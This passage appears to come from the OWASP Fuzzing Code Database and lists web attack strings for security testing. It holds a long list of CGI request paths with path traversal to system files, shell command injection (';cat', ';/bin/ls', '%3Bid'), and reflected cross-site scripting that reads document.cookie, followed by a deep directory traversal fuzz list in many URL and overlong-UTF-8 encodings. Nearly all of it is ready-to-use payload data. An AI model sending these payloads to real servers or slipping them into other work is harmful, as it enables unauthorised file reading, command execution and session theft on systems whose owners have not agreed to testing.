powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}
 +
printenv
 +
printenv.tmp
 +
probecontrol.cgi?command=enable&username=cancer&password=killer
 +
processit.pl
 +
profile.cgi
 +
pu3.pl
 +
publisher/search.cgi?dir=jobs&template=;cat%20{KNOWNFILE}|&output_number=10
 +
query
 +
query?mss=%2e%2e/config
 +
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&cart_id=
 +
quikstore.cfg
 +
quizme.cgi
 +
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}
 +
ratlog.cgi
 +
redirect
 +
register.cgi
 +
replicator/webpage.cgi/
 +
responder.cgi
 +
retrieve_password.pl
 +
rksh
 +
rmp_query
 +
robadmin.cgi
 +
robpoll.cgi
 +
rpm_query
 +
rsh
 +
rtm.log
 +
rwcgi60
 +
rwcgi60/showenv
 +
rwwwshell.pl
 +
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1
 +
sawmill?rfcf+%22
 +
sbcgi/sitebuilder.cgi
 +
scoadminreg.cgi
 +
scripts/*%0a.pl
 +
search.cgi
 +
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
 +
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
 +
search.php?searchstring=<script>alert(document.cookie)</script>
 +
search.pl
 +
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script>
 +
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00
 +
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
 +
sendform.cgi
 +
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
 +
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}
 +
session/adminlogin
 +
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}
 +
sh
 +
shop.cgi?page=../../../../../../..{KNOWNFILE}
 +
shop.pl/page=;cat%20shop.pl|
 +
shop/auth_data/auth_user_file.txt
 +
shop/orders/orders.txt
 +
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}
 +
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20{KNOWNFILE}|
 +
show.pl
 +
showcheckins.cgi?person=<script>alert('XSS')</script>
 +
showuser.cgi
 +
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|
 +
simplestguest.cgi
 +
simplestmail.cgi
 +
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|
 +
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|
 +
sojourn.cgi?cat=../../../../../../../../../../etc/password%00
 +
spin_client.cgi?aaaaaaaa
 +
ss
 +
sscd_suncourier.pl
 +
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}
 +
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
 +
stat.pl
 +
stat/
 +
stats-bin-p/reports/index.html
 +
stats.pl
 +
stats.prf
 +
stats/
 +
stats/statsbrowse.asp?filepath=c:\&Opt=3
 +
stats_old/
 +
statsconfig
 +
statusconfig.pl
 +
statview.pl
 +
store.cgi?
 +
store/agora.cgi?cart_id=<script>alert('XSS')</script>
 +
store/agora.cgi?page=whatever33.html
 +
store/index.cgi?page=../../../../../../../..{KNOWNFILE}
 +
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00
 +
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00
 +
survey
 +
survey.cgi
 +
sws/admin.html
 +
sws/manager.pl
 +
tablebuild.pl
 +
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&action=view&matchview=1
 +
tcsh
 +
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..{KNOWNFILE}
 +
test-cgi.tcl
 +
test-cgi?/*
 +
test-env
 +
test.cgi
 +
test/test.cgi
 +
texis/junk
 +
texis/phine
 +
textcounter.pl
 +
tidfinder.cgi
 +
tigvote.cgi
 +
title.cgi
 +
tpgnrock
 +
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}
 +
troops.cgi
 +
ttawebtop.cgi/?action=start&pg=../../../../../../../../../..{KNOWNFILE}
 +
ultraboard.cgi
 +
ultraboard.pl
 +
unlg1.1
 +
unlg1.2
 +
update.dpgs
 +
upload.cgi
 +
uptime
 +
urlcount.cgi?%3CIMG%20
 +
ustorekeeper.pl?command=goto&file=../../../../../../../../../..{KNOWNFILE}
 +
utm/admin
 +
utm/utm_stat
 +
view-source
 +
view-source?view-source
 +
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00
 +
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script>
 +
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
 +
viewlogs.pl
 +
viewsource?{KNOWNFILE}
 +
viralator.cgi
 +
virgil.cgi
 +
vote.cgi
 +
vpasswd.cgi
 +
vq/demos/respond.pl?<script>alert('XSS')</script>
 +
w3-msql
 +
w3-sql
 +
wais.pl
 +
way-board.cgi?db={KNOWNFILE}%00
 +
way-board/way-board.cgi?db={KNOWNFILE}%00
 +
webais
 +
webbbs.cgi
 +
webbbs/webbbs_config.pl?name=joe&[email protected]&body=aaaaffff&followup=10;cat%20{KNOWNFILE}
 +
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
 +
webdist.cgi?distloc=;cat%20{KNOWNFILE}
 +
webdriver
 +
webgais
 +
webif.cgi
 +
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
 +
webmap.cgi
 +
webnews.pl
 +
webplus?about
 +
webplus?script=../../../../../../../../../..{KNOWNFILE}
 +
websendmail
 +
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}
 +
webutil.pl
 +
webutils.pl
 +
webwho.pl
 +
where.pl?sd=ls%20/etc
 +
whois.cgi?action=load&whois=%3Bid
 +
whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}
 +
whois/whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}
 +
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}
 +
windmail
 +
wrap
 +
wrap.cgi
 +
ws_ftp.ini
 +
www-sql
 +
wwwadmin.pl
 +
wwwboard.cgi.cgi
 +
wwwboard.pl
 +
wwwstats.pl
 +
wwwthreads/3tvars.pm
 +
wwwthreads/w3tvars.pm
 +
wwwwais
 +
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00
 +
zsh
 +
</pre>
 +
 +
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===
 +
<pre>
 +
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010)
 +
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni
 +
# Did some cleanup & removed anything to the right of {FILE} for inclusion in a
 +
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database.
 +
 +
 +
../{FILE}
 +
../../{FILE}
 +
../../../{FILE}
 +
../../../../{FILE}
 +
../../../../../{FILE}
 +
../../../../../../{FILE}
 +
../../../../../../../{FILE}
 +
../../../../../../../../{FILE}
 +
..%2f{FILE}
 +
..%2f..%2f{FILE}
 +
..%2f..%2f..%2f{FILE}
 +
..%2f..%2f..%2f..%2f{FILE}
 +
..%2f..%2f..%2f..%2f..%2f{FILE}
 +
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
 +
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
 +
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
 +
%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
..%252f{FILE}
 +
..%252f..%252f{FILE}
 +
..%252f..%252f..%252f{FILE}
 +
..%252f..%252f..%252f..%252f{FILE}
 +
..%252f..%252f..%252f..%252f..%252f{FILE}
 +
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
 +
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
 +
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
 +
%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
..\{FILE}
 +
..\..\{FILE}
 +
..\..\..\{FILE}
 +
..\..\..\..\{FILE}
 +
..\..\..\..\..\{FILE}
 +
..\..\..\..\..\..\{FILE}
 +
..\..\..\..\..\..\..\{FILE}
 +
..\..\..\..\..\..\..\..\{FILE}
 +
..%255c{FILE}
 +
..%255c..%255c{FILE}
 +
..%255c..%255c..%255c{FILE}
 +
..%255c..%255c..%255c..%255c{FILE}
 +
..%255c..%255c..%255c..%255c..%255c{FILE}
 +
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
 +
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
 +
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
 +
..%5c..%5c{FILE}
 +
..%5c..%5c..%5c{FILE}
 +
..%5c..%5c..%5c..%5c{FILE}
 +
..%5c..%5c..%5c..%5c..%5c{FILE}
 +
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
 +
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
 +
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
 +
%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
..%c0%af{FILE}
 +
..%c0%af..%c0%af{FILE}
 +
..%c0%af..%c0%af..%c0%af{FILE}
 +
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
 +
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
 +
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
 +
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
 +
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
 +
%c0%ae%c0%ae/{FILE}
 +
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
 +
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
 +
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
 +
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
 +
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
 +
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
 +
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
 +
%c0%ae%c0%ae%c0%af{FILE}
 +
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
 +
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
 +
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
 +
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
 +
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
 +
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
 +
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
 +
..%25c0%25af{FILE}
 +
..%25c0%25af..%25c0%25af{FILE}
 +
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
 +
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
 +
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
 +
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
 +
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
 +
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
 +
%25c0%25ae%25c0%25ae/{FILE}
 +
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
 +
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
 +
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
 +
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
 +
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
 +
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
 +
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
 +
%25c0%25ae%25c0%25ae%25c0%25af{FILE}
 +
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
 +
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
 +
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
 +
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
 +
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
 +
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
 +
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
 +
..%c1%9c{FILE}
 +
..%c1%9c..%c1%9c{FILE}
 +
..%c1%9c..%c1%9c..%c1%9c{FILE}
 +
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
 +
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
 +
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
 +
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
 +
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
 +
%c0%ae%c0%ae\{FILE}
 +
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
 +
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
 +
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
 +
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
 +
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
 +
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
 +
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
 +
%c0%ae%c0%ae%c1%9c{FILE}
 +
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
 +
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
 +
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
 +
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
 +
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
 +
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
 +
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
 +
..%25c1%259c{FILE}
 +
..%25c1%259c..%25c1%259c{FILE}
 +
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
 +
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
 +
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
 +
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
 +
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
 +
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
 +
%25c0%25ae%25c0%25ae\{FILE}
 +
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
 +
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
 +
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
 +
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
 +
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
 +
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
 +
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
 +
%25c0%25ae%25c0%25ae%25c1%259c{FILE}
 +
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
 +
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
 +
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
 +
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
 +
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
 +
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
 +
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
 +
..%%32%66{FILE}
 +
..%%32%66..%%32%66{FILE}
 +
..%%32%66..%%32%66..%%32%66{FILE}
 +
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
 +
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
 +
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
 +
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
 +
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
 +
%%32%65%%32%65/{FILE}
 +
%%32%65%%32%65/%%32%65%%32%65/{FILE}
 +
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
 +
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
 +
